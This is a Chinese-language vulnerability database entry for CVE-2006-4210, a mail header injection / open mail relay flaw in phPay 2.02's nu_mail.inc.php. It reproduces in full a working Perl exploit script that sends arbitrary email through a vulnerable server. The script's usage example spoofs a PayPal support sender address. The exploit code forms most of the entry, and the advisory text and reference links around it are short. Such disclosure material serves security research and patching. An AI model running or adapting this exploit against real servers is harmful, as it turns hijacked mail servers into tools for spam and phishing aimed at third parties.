phPay 'Nu_mail.inc.PHP'开放邮件中继漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110820 漏洞类型 输入验证
发布时间 2006-08-14 更新时间 2006-08-24
CVE编号 CVE-2006-4210 CNNVD-ID CNNVD-200608-279
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/2181
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-279
|漏洞详情
AndreasKansokphPay2.02和2.02.1版本中的nu_mail.inc.php脚本,当register_globals启用时,远程攻击者可借助畸形的mail_text2,user_row[5],nu_mail_1和shop_mail参数将服务器作为开放邮件中继。
|漏洞EXP
#!/usr/bin/perl
#####################
# Script: phPay v2.02 http://phpay.de/
# Vuln File: nu_mail.inc.php
# Exploit & Advisory: beford <xbefordx gmail com>
# Vulnerability: mail() Injection
# Vuln Code:
# <?php
# if (ereg("nu_mail.inc.php", $SCRIPT_NAME)) header("Location:./index.html");
# elseif (ereg("nu_mail.inc.php", $_SERVER['SCRIPT_NAME'])) header("Location:./index.html");
# $mail_text="$mail_2a\n\n";
# ...
# That *should* prevent direct access to the vulnerable file, but they didnt die()/exit()'ed
# so, pwnt. You need register globals enabled to be able of exploiting this issue.
#
#####################
use LWP::UserAgent;
use URI::URL; 
print "\n[*] phPay v2.02 nu_mail.inc.php mail() Injection\n[*] exploit&advisory: beford <xbefordx gmail com>\n";
if (scalar(@ARGV)<6) {
	print "\tUsage:\t./own.pl <host> <path> <email-to> <email-subject> <email-message> <email-from> [headers]\n";
	print "\t<host> : orly\n";
	print "\t<path> : folder where phpay is installed /phpay/ /phpayv2.02/ ..\n";
	print "\t<email-to> <email-subject> <email-message> <email-from> : duh\n";
	print "\t[headers] : optional extra headers for mail \"%0AContent-type: text/html%0A%0A\"\n\n";
	print "\t./own.pl http://www.vuln.es /phpayv2.02/ x\@mail.co h4x \"hack\" support\@paypal.com \n\n";
	exit;
}
$host = shift @ARGV;
$path = shift @ARGV;
$to = shift @ARGV;
$subject = shift @ARGV;
$message = shift @ARGV;
$from = shift @ARGV;
$headers = shift @ARGV;
my $url = URI::URL->new($full);
$full = $url->as_string;
$full =  "${host}${path}nu_mail.inc.php?mail_text2=${message}&user_row[]=&user_row[5]=${to}&nu_mail_1=${subject}&shop_mail=${from}${headers}";
print "[*] exploiting $host\n";
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new('GET',"$full");
$res = $ua->request($req);
print "\t[*] mail sent\n" if $res->is_success;

# milw0rm.com [2006-08-14]
|参考资料

来源:XF
名称:phpay-numail-header-injection(28366)
链接:http://xforce.iss.net/xforce/xfdb/28366
来源:BID
名称:19517
链接:http://www.securityfocus.com/bid/19517
来源:MILW0RM
名称:2181
链接:http://www.milw0rm.com/exploits/2181
来源:SECUNIA
名称:21454
链接:http://secunia.com/advisories/21454
来源:MILW0RM
名称:2181
链接:http://milw0rm.com/exploits/2181